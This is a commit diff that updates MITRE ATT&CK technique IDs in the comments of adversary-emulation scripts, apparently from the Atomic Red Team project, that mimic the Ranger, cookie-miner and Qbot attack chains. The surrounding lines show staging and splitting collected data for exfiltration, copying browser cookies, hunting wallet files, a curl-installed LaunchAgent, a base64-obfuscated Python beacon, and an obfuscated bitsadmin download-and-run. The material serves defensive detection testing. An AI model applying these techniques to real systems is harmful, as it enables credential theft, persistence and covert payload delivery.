update ATT&CK ids on Ranger, cookie miner, and qbot chain reactions (#1243)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh

@@ -9,7 +9,7 @@
 # Tactic: Collection
 # Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
 # Tactic: Defense Evasion
-# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
+# Technique: Hide Artifacts: Hidden Files and Directories https://attack.mitre.org/techniques/T1564/001/
 # Create a hidden directory to store our collected data in
 
 mkdir -p /tmp/.staging_art/
@@ -72,7 +72,7 @@ else
 fi
 
 # Tactic: Discovery
-# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
+# Technique: Software Discovery: Security Software Discovery https://attack.mitre.org/techniques/T1518/001/
 # Check for common security Software
 
 SECINF=/tmp/.staging_art/security.txt
@@ -82,8 +82,7 @@ echo "Testing: Gathering Security Software Information"
 echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
 
 # Tacttic: Exfiltration
-# Technique:  Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
-# Technique:  Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
+# Technique:  Archive Collected Data: Archive via Library https://attack.mitre.org/techniques/T1560/002/
 # Compress and encrypt all collected data
 
 echo "Testing: Zip up the Recon"
@@ -97,7 +96,7 @@ echo "Testing: Split the file for Exfil"
 split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
 
 # Tactic: Defense Evasion
-# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
+# Technique: Delete File Indicator Removal on Host: File Deletion https://attack.mitre.org/techniques/T1070/004/
 # Delete evidence
 
 rm -rf /tmp/.staging_art/

ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh

@@ -15,11 +15,11 @@ mkdir ${OUTPUT}
 cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
 
 #   Tactic: Exfiltration
-#   Technique: T1002 - Data Compressed
+#   Technique: T1560.002 - Archive Collected Data: Archive via Library
 zip -r interestingsafaricookies.zip ${OUTPUT}
 
 #   Tactic: Exfiltration
-#   Technique: T1048 - Exfiltration Over Alternative Protocol
+#   Technique: T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
 #   Simulate network connection for exfiltration
 curl https://atomicredteam.io > /dev/null
 
@@ -31,7 +31,7 @@ find ~ -name "*wallet*" > interestingfiles.txt
 cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
 
 #   Tactic: Persistence
-#   Technique: T1159 - Launch Agent
+#   Technique: T1543.001 - Create or Modify System Process: Launch Agent
 mkdir -p ~/Library/LaunchAgents
 cd ~/Library/LaunchAgents
 curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
@@ -44,6 +44,6 @@ cd /Users/Shared
 curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
 
 #   Tactic: Defense Evasion
-#   Technique: T1222 - File Permissions Modification
+#   Technique: T1222.002 - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
 chmod +x ./xmrig2
 ./xmrig2

ARTifacts/Chain_Reactions/cookie-miner-stage-02.py

@@ -20,6 +20,6 @@
 # Technique: T1057 - Process Discovery
 #
 # Tactic: Command and Control
-# Technique: T1043 - Commonly Used Port
+# Technique: T1071.001 - Application Layer Protocol: Web Protocols
 #
 import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))

ARTifacts/Chain_Reactions/qbot_infection_reaction.vbs

@@ -10,7 +10,7 @@ Set shell = WScript.CreateObject("WScript.Shell")
 Set wmi_os_caption = shell.Exec("wmic OS get Caption /value")
 
 '   Tactic: Discovery
-'   Technique: T1063 - Security Software Discovery
+'   Technique: T1518.001 - Software Discovery: Security Software Discovery
 Set securityCenterWMI = GetObject("winmgmts:\\.\root\SecurityCenter2")
 Set avItems = securityCenterWMI.ExecQuery("Select * From AntiVirusProduct")
 
@@ -18,7 +18,7 @@ Set fso = CreateObject("Scripting.FileSystemObject")
 localFile = fso.GetSpecialFolder(2) & "\Atomic_Qbot.exe"
 
 '   Tactic: Command and Control
-'   Technique: T1105 - Remote File Copy
+'   Technique: T1105 - Ingress Tool Transfer
 bitsadminReturn = shell.Run("bit"&"sadmin /transfer qcxjb" & Second(Now) & " /Priority HIGH " & "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe " & localFile, 0, True)
 
 '   Tactic: Defense Evasion